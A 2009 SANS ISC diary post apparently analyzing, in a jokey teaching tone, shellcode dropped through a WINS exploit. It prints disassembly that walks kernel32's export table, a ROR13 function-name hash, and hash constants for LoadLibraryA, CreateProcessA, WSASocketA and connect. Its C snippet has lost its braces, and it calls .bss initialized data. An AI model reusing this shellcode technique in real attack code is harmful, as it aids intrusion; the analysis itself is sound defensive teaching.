Follow the Bouncing Malware: Gone With the WINS - Part II

Published: 2009-05-20
Last Updated: 2009-05-20 15:20:55 UTC
by Tom Liston (Version: 1)
2 comment(s)

Imagine, if you will, that you're the newest contestant on the latest reality-tv show, Idle American Apprentice to the Dancing Bachelorette Stars.  Like all good reality shows (now there's an oxymoron...), you have the opportunity to "earn" your way to be safe from elimination (you know, that time of the evening when the grumpy, scowling dude with the bad comb-over says "You're Fired"®), if you can manage to "win" some sort of utterly contrived daily "challenge."

And, oh, what a challenge it is! 

You're teamed up with a partner, who is blindfolded, given a cell phone, and driven to your home.  After being spun around a few dozen times to mess with their sense of direction (and really, who doesn't like seeing dizzy, stressed-out people in blindfolds stumbling around in unfamiliar surroundings? Heck, that's how the missus and I spend many a Friday evening... uh... um... nevermind...) they're placed in some random room of your home.  Using only the cell phone, you need to be the first contestant to somehow direct them to find the kitchen and make your pouty-lipped, rail-thin bachelorette a peanut-butter 'n' jelly sammich.

So, what do you do?

Obviously, before anyone will be slappin' Smuckers and Skippy on bread, there's going to need to be a whole lot o'back-and-forth on the phone-- first, as you try to figure out where they are, and then as you try to tell them how to get where they need to be.  Remember, they can't see because they're blindfolded, so you'll need to rely on all of their other senses.  You might start by asking them whether there is carpet on the floor, whether they hear the ticking of a clock... you might ask them to slowly walk around the room and to tell you what the furniture they find in the room feels like, etc... etc... The idea is, you have to start by trying to somehow figure out their location.  Once you know where they are, then you can start giving them some broad direction: "First, face the couch... then turn left. Walk forward until you get to the wall, and then move along it to your left until you find the door. Go out through the door and turn left..."  Then, as you navigate them into the kitchen, you'll get increasingly specific: "open the third cupboard door to the left of the stove, the peanut butter is on the second shelf..."

The overall "flow" in the challenge can be summed up by a series of "big" questions, roughly corresponding to: "Where am I?", "Where is the kitchen?", and "Where is the stuff I need to make lil' Miss Skinny a sammich?"  Answering each of these requires that you've successful answered each of the questions that preceded it.

This is a fairly useful analogy to the situation in which the malware that we've been looking at has found itself.  Having exploited one of the WINS vulnerabilities patched in MS04-045, the malware is being executed in some pretty unfamiliar territory.  Like your partner in the challenge, it's not in a totally alien landscape: houses are houses... but knowing things about houses in general won't get you navigating around a specific house.  So it is for our chunk o' malware: it's missing all of the niceties that the operating system normally provides.  To understand why this is so, it's necessary for you to understand a little about how Windows programs actually work.

While there are literally millions of vastly different Windows programs available, in many ways, just like "a house is a house", a "program is a program."  On one level, they do many different things... on another level, they do many of the same things:  they display windows on the screen, they access information both from the filesystem, the peripherals, and from the network, they have clickable buttons, edit fields, drop down menus, scroll-bars, tabs, etc...  If each program on your system had to individually drag along all of the code necessary to do all of those things, then even the most trivial program would rapidly turn into a steaming, multi-megabyte pile of bloat-- i.e. your standard VisualBasic or Delphi app ;-)

To make life easier for programmers and consistent for users (hey, imagine if EVERY application had it's own "unique" user interface... ouch, that's gonna leave a mark...) much of the normal, day-to-day "stuff" that programs do has been rolled into shared code libraries ("Dynamic Link Libraries" or DLLs in Windows).  When a Windows program is built, all of the requests for the "stuff" found in the shared code libraries are relegated to a set of "jumping off points" called the "Import Table."  For example, if I write a program that displays a "Do you really want to delete this file?" message box (followed, no doubt, by a "Do you really, REALLY want to delete this file" request) the dialog box is displayed using the system function MessageBoxA().  When my program is compiled, every MessageBoxA() function call that I make in my application, actually goes to that "jumping off point" (which, up until the program loads, doesn't "jump off" to anything...)  When my program executes, the Windows Loader looks at the import table, and loads any of the shared DLL libraries that my program needs into its memory space.  It then runs down through the list of imported functions that my program is using, and fixes up those "jumping off points" so that they point to the correct place within the DLL code in my program's memory space.

Back to our analogy for a moment, the main application is like you... the person who knows their way around the house.  The running application (i.e. you), knows where everything is, because it was there when the house was "built" (i.e. when the Windows Loader loaded up the application and fixed up the import table)  The malicious code that we're looking at has never been in this particular "house" before, and it doesn't know where anything is... it's stumbling around blindfolded and... well... skinning its knees on the coffee table in the living room as we speak.

In Part 1 of this little excursion, we wrapped things up just when the malcode, after first figuring out its own location (so it could decrypt itself), had figured out where the BaseAddress of kernel32.dll was located.  In our analogy, this is the equivalent of you and your partner figuring out that they're in the living room, and then successfully navigating to the kitchen.  The kitchen (played by the enormously popular kernel32.dll) is where all the really useful tools are located... so now let's see how we're going to find them.

If you'll recall, we had just returned from a subroutine that chained through several in-memory data structures (starting with the Process Environment Block) to find the BaseAddress of kernel32.dll, which is now safely stored in EAX.  Here's what we return to:

0000047C                 mov     [esi], eax
0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E

Also recall that we had created a new chunk o' stack for ourselves and had stored its location in ESI.  When we returned from the previous subroutine, interestingly, the stack wasn't completely cleaned up... normally a very bad programming practice that would cause your program to toss its digital cookies. However, remember that the malware created it's own "mini-stack" and will (hopefully!) put things back the way it found it before it's through.  In any case, that first instruction is now shoving a copy of the base address of kernel32.dll into the "lost" stack space while the next instruction pushes a reference to that location onto the top of the stack.  In programming parlance, the "lost" stack locations were used "on the fly" to create some space that our malcode will use like a .bss segment (the .bss segment in a program is a segment which contains initialized data... Extra Credit: Anyone know why it's called ".bss"?)

Next, the malcode then pushes a pretty funky number (0xEC0E4E8E) onto the stack and then calls a subroutine.  What the heck is that all about?  Let's take a look at the code for the subroutine (sub_58E) that is being called, and see if we can figure it out:

0000058E ; ¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦
0000058E sub_58E         proc near
0000058E arg_0           = dword ptr  14h
0000058E arg_4           = dword ptr  18h
0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi
00000592                 mov     ebp, [esp+arg_4]
00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp
0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp
000005A7 loc_5A7:
000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld
000005B2 loc_5B2:
000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2
000005C0 ; --------------------------------------
000005C0 loc_5C0:
000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7
000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp
000005CB                 mov     cx, [ebx+ecx*2]
000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp
000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD
000005DB ; --------------------------------------
000005DB                 xor     eax, eax
000005DD loc_5DD:
000005DD                 mov     edx, ebp
000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx
000005E3                 retn    4
000005E3 sub_58E         endp
000005E3 ; --------------------------------------

"Gadzooks!  Now hold on just a darned minute!" I hear you cry. "When I signed up for this trip, you said 'some assembly required' but Tom, this is gettin' ridiculous..."

Tempted as I am to go all "General Patton" on your cowardly ass, I will instead gently reassure you that we'll just take things one step at a time and work our way through this stuff together.  We may even hold hands.  So take a deep breath, let it out slowly-- put on your most comfortable set of shoes, pour yourself a wine spritzer, and we'll begin:

Remember from before, that good programming practice dictates that we save out the values in the registers that we're going to use, before we use them... so that we can put everything back in place when we're done.  That's what these four instructions are doing:

0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi

These match up nicely with four other instructions down near the end of the subroutine:

000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx

Remember, those ones at the end need to pop out the values that we pushed onto the stack in the opposite order... because it's a last-in-first-out (LIFO) stack.  Which, coincidentally, also is the reason for the meaning behind the next instruction:

00000592                 mov     ebp, [esp+arg_4]

Looking up at the top of the subroutine code, we can see that our disassembler has done something a little weird.  It's created some variables for us, called "arg_0" and "arg_4."  You see, the disassembler understands a couple of interesting things about how code is written, and it has taken that into account when it generated the disassembly in order to help us understand a little more about the code we're looking at.

Generally, programs tend to do small chunks of "stuff" over and over again.  Those chunks of "stuff" are organized by programmers into "functions" or "subroutines."  Functions take parameters (for instance, if you wrote a function to add two numbers, the parameters would be the two numbers to be added), and at the assembly language level, those parameters are passed on the stack. (Gosh, but this "stack" thing is useful, isn't it?)  Before we called this particular subroutine, we pushed some values onto the stack... since, at some point, the subroutine apparently uses those values (as we're about to see...) the disassembler then makes sure we understand what's going on by calling the two parameters (or arguments) to our attention, explicitly, at the top of the subroutine's disassembly.  The problem is this: the parameters are buried deep down in the stack... below the return location that gets pushed onto the stack when the subroutine is called, and even below the stuff that we just now pushed onto the stack-- so we're not gonna be able to just pop those suckers off and use 'em.  That's where these special offset variables up at the top of the subroutine come into play.   The disassembler understands what's going on, and does it's best to explain it to us by referencing these as "arg_0" and "arg_4" wherever they are used.  Unlike me, sometimes the disassembler will get things wrong... but for the most part (and especially in this case), it knows what it's talking about.

Now, remembering that the arguments are pushed onto a LIFO stack, we know that the deeper in the stack the variable is, the earlier it was pushed on... so "arg_4" corresponds to the BaseAddress of kernel32.dll that was pushed onto the stack with this statement:

0000047E                 push    dword ptr [esi]

So, based on the instructions at 0000592, EBP now contains the Base address of kernel32.dll. Then, we see the following:

00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp

so, EAX points to the BaseAddress of kernel32.dll (EBP) plus 60 (0x3C).  EDX then points to whatever is in *that* address added to the BaseAddress of kernel32.dll plus 120 (0x78).  Hmmm... let's see if we can figure out what that means.

We've been talking all along about the "BaseAddress" of kernel32.dll like that actually meant something... but what?  Well, when a dynamic link library (DLL) is loaded into the memory space of a program, what happens is that the full-blown .dll file itself is simply mapped directly into memory-- lock, stock, and barrel.  So, when we talk about the "BaseAddress" for the .dll, it is simply the beginning of that memory mapped file.  So, in order to understand what's going on here, we need to take a look at the format of a .dll file-- which is simply another vile and sinister incarnation of the more general "Portable Executable" (PE) file format used for most Windows executables.

Every PE file begins with an ode to the past... an old DOS header that hangs around to keep Windows backwards compatible.  (Yep, you can run Word 2007 in MS-DOS-- don't let anyone tell you differently. It won't really be all that interesting: it'll just tell you that you need to run it under Windows, but don't be fooled: it executed...) Now, deep down inside that old DOS header (called the "MZ" header... 'cause it begins with Mark Zbikowski's initials...) at position 0x3C is a 32-bit value known as "e_lfanew" that tells you the offset from the beginning of the file to the PE header itself.  In other words, that value tells you how many bytes of "backwards compatible" you need to skip to get to the real meat: the PE header. So what we're seeing so far makes sense: EAX is loaded up with the value of "e_lfanew" and added to the BaseAddress (that's then the beginning of the PE header).  Then, EDX is loaded up with a value at 0x78 within the PE header itself.  Let's see what's there...

Rolling down through the PE header to offset 0x78, we find that location occupied by a 32-bit value known as the "Export Table RVA."  When dealing with PE files, the idea of an "RVA" or "Relative Virtual Address" is used repeatedly.  Because PE files can't be guaranteed that they'll be loaded at the same memory location every time, most of the references to locations within the file are expressed as offsets from the BaseAddress-- a "Relative Virtual Address" or RVA.  And, in this case, we're seeing exactly why that's useful... it's going to make things a whole lot easier for us, because if we know anything at all, it's the BaseAddress of kernel32.dll.  In fact, in the very next instruction we see that we're updating EDX (by adding kernel32.dll's base address, found in EBP) so that it now points directly to the Export Table.

What the heck is an Export Table?  Well, remember that DLL files are simply libraries of interesting, reusable functions... code to perform exactly the kind of stuff that our malware (and legitimate programs) need to perform over and over.  But, for a DLL to be useful, it needs some way to tell other programs (programs that normally load the DLL at run-time) where, within itself, those interesting functions are found.  The Export Table is a structure that acts sort of like the card-catalog in a library (uh... do libraries actually even have card catalogs anymore, or did I just date myself?), allowing the Windows Loader to know where the functions that the DLL makes available are found, so it can then "fix up" the "Import Table" of the program loading the DLL-- which can then actually use the functions.  The Export Table itself has a specific, known structure, which we'll need to get on speaking terms with, because... well... the next three instructions look like this:

0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp

In this case, we see that we're copying the value found at offset 0x18 in the Export Table into ECX and the value found at offset 0x20 into EBX.  Since this appears to be somewhat important, in a vaguely "it causes the program to work" sorta way, we should probably try to find out what those values represent...

At offset 0x18 in the Export Table structure is a 32 bit value that represents the number of named functions exported by the DLL, and the value at 0x20 is an RVA for the beginning of a list of those names.  After the "add" instruction, EBX contains a the full address of that name list.

The next chunk of code:

000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld

starts off by checking the value in ECX: if it is zero, we end up jumping off someplace else that... well... we'll worry about later-- otherwise, the value in ECX is decremented by one.  Right off the bat, this gives us an idea of what is going on here: remember that ECX contained a count of the number of named functions that are exported by kernel32.dll... and so to me, it looks like we're going to step through each of those names looking for something... like some sort of modern-day, silicon-based Diogenes.

Because the names of the functions exported by kernel32.dll aren't all the same length, rather than store the names one after the other, which would require some fancy bookkeeping to keep track of name length, the list of function names is actually a list of RVA values that point to the beginning of each name.  The names themselves are terminated by a "zero," so keeping track of length is unnecessary.  Each RVA is four bytes long, and so this instruction:

000005AA                 mov     esi, [ebx+ecx*4]

is simply a way of calculating the location of the last RVA in the list and putting the result into ESI.  As we decrease the value of ECX, we'll move "down" through the list until ECX hits zero, where, it appears the loop will terminate.  The next two instructions clear out the value of EDI (remember how XOR works?) and then clears the "Direction" flag so that when the next chunk o' code begins rolling over the function name, it's for certain going to be moving in the correct direction. (Don't worry about it... just trust me, it's necessary.)

Now if that little excursion into the world of faith wasn't enough for you, the next few instructions will require you to take my word on even more stuff... 'cause explainin' how we get from one to the other would take us WAAAAY beyond the friendly confines of this little essay.  (I would never lie to you... about anything really, really important....) So, trust me... this stuff here:

000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2

is actually the assembly language equivalent of the C function:

unsigned long hash(char *function_name)
    unsigned long hash = 0;
    while (*function_name != 0) {
        hash = hash << (32 - 0x0D) | hash >> 0x0D;
        hash += *function_name++;
    return hash;

This function takes a function name (or really, any string) and then creates a hash value for that name.  "Wow," I hear you say, "it makes a hash value!  That's soooo cool... But what is a hash value?"  A hash value is the result of a function that simply takes a large chunk o' "source" data, and creates a sort of "digital fingerprint"-- a much shorter "hash" value that in some weird mathematical way "represents" the source.  Now because we're representing a large value using a much smaller value, there is no question that each of the resulting hashes will very likely map to more than one single "source" (something called a "hash collision") but for the purposes here, this is a quick and dirty way for our malware to find the function it wants to use, without ever having to actually have the name of the function stuffed somewhere in it's code.  Why is that important?  Well, first of all, it makes reverse engineering these things all that much more difficult, but it also makes it harder for an IDS to catch the code as it flies by.

Next, we see the following code:

000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7

This portion of the code begins by comparing the hash value that we just created against that funky number that was pushed onto the stack, as a parameter for this function... remember... 0x0EC0E4E8E...  If it doesn't match, we jump back up to the beginning of our loop, check to see if ECX is zero, decrement it, and check the next name-- lather, rinse, repeat.  If it does match, then we load up EBX with the value found at offset 0x24 of the Export Table (the address of which is still in EDX):

000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp

Offset 0x24 of the Export Table contains the RVA of the beginning of the OrdinalName list.  The "ordinal" of a function is simply its number (1, 2, 3, 4...) within the list of all functions exported by the DLL.  Every exported function has an ordinal-- but every function may not have a name-- some are only ever known by their ordinal. (Why? Because you can make your DLL smaller by forgoing names and using ordinals only... <sarcasm> and we all know that the Oompah Loompahs out in Redmond really care about bloat </sarcasm>... hell, they set the default file alignment on their linker to 4096 and routinely statically link the MSVC runtime in every executable... So, of course, they're gonna want to have a way to save a few bytes by jettisoning the damn function names... But, I digress...) Because of this, the actual location of the code must always be accessed through the ordinal list. The OrdinalName list contains the ordinal for each named exported function, in the same order that the names appear.  So... if you know where you are in the list o' names, you can simply look up the correct ordinal...  In the code above, we first load EBX with the OrdinalName list's RVA, and then add the BaseAddress of kernel32.dll to it.

000005CB                 mov     cx, [ebx+ecx*2]

Ordinals are only 2 bytes long, and since ECX contains the current "position" where we found our name on the name list, it's pretty straightforward to use that same number to get us our ordinal off of the OrdinalName list... which we conveniently load right back into ECX.

000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp

The FunctionAddress list itself is found at offset 0x1C in the Export Table.  For each exported function, the FunctionAddress list contains the RVA of the actual function's code... listed in ordinal order.  So we load the RVA of the beginning of the FunctionAddress list into EBX and add kernel32.dll's BaseAddress (in EBP).

000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD

At this point, ECX contains our ordinal, and each of the addresses in the FunctionAddress list is 4 bytes long... so the instructions above load the RVA of the function we're looking for into EAX and then add the BaseAddress of kernel32.dll.  We then jump to some code that cleans everything up and returns from our subroutine with the information we're looking for tucked away inside EAX.  If something goes south (i.e. we get through the whole list without finding a matching hash) then the subroutine will return with EAX zeroed out.

So, what function was represented by the magic hash value we passed in?  Here's a list of some of the hash values for kernel32.dll functions and also some additional code that shows some other functions being located:

Function Name             Hash
LoadLibraryA              0xEC0E4E8E
CreateProcessA            0x16B3FE72
ExitThread                0x60E0CEEF

0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E
0000048A                 mov     [esi+4], eax
0000048D                 push    dword ptr [esi]
0000048F                 push    16B3FE72h
00000494                 call    sub_58E
00000499                 mov     [esi+8], eax
0000049C                 push    dword ptr [esi]
0000049E                 push    60E0CEEFh
000004A3                 call    sub_58E
000004A8                 mov     [esi+0Ch], eax

Note that when each of the calls to the sub_58E subroutine returns, the stack is again, "messed up".  This is done on purpose to continue to open up more pseudo-bss space in which the malware stores the location of a specific kernel32.dll function.  Since ESI marks the beginning of the original "stack," that is used as the reference point for accessing the addresses of the functions.  At ESI+0x04, is the address of LoadLibraryA, at ESI+0x08 is the address of CreateProcessA, and at ESI+0x0C is the address of ExitThread.

Next, the malware puts one of these newly acquired functions to use:

000004AB                 push    3233h
000004B0                 push    5F327377h
000004B5                 push    esp
000004B6                 call    dword ptr [esi+4]
000004B9                 mov     [esi+10h], eax

All of that pushin' at the beginning of this section is actually shoving the name "ws2_32" onto the stack itself (Go and look at an ASCII chart... and remember stuff is backwards).  That final push of ESP is actually now acting as a pointer to the string sitting on the stack (ESP is a register that contains a pointer to the top of the stack... since our string is sitting on the stack-- we just pushed it on there, ESP acts to point at the string).  Finally, the malware again uses the fact that the stack is "messed up" to provide is a storage location for the BaseAddress of ws2_32.dll at esi+0x10 when we get back from the kernel32.dll code.

000004BC                 push    dword ptr [esi+10h]
000004BF                 push    0ADF509D9h
000004C4                 call    sub_58E
000004C9                 mov     [esi+14h], eax
000004CC                 push    dword ptr [esi+10h]
000004CF                 push    60AAF9ECh
000004D4                 call    sub_58E
000004D9                 mov     [esi+18h], eax
000004DC                 push    dword ptr [esi+10h]
000004DF                 push    79C679E7h
000004E4                 call    sub_58E
000004E9                 mov     [esi+1Ch], eax
000004EC                 push    dword ptr [esi+10h]
000004EF                 push    3BFCEDCBh
000004F4                 call    sub_58E
000004F9                 mov     [esi+20h], eax

Now, using the BaseAddress of the ws2_32.dll, the malware looks for hashes matching the following:

WSASocketA            0xADF509D9        (esi+0x14)
connect               0x60AAF9EC        (esi+0x18)
closesocket           0x79C679E7        (esi+0x1C)
WSAStartup            0x3BFCEDCB        (esi+0x20)

And stores each of them at the offsets from ESI listed above...

Ok... so, boys and girls, how was that for a wild ride?  Does your brain hurt yet?  Man, oh man... mine does! 

Well, we made it to the "kitchen," and we figured out how to find all of the tools necessary for our malware to make a sammich... In the next installment, we'll take a look at how that sammich gets made and what it actually does.

Tom Liston - InGuardians, Inc.
Handler On Duty
Chairman - SANS WhatWorks in Virtualization and Cloud Computing Security Summit
Follow me on Twitter

2 comment(s)


A slight correction: When the code is loading ws2_32.dll, ESP isn't pushed to take up space on the stack: it's pointing to the string parameter.
Fixed! Thank you for pointing that out, Chris.

Diary Archives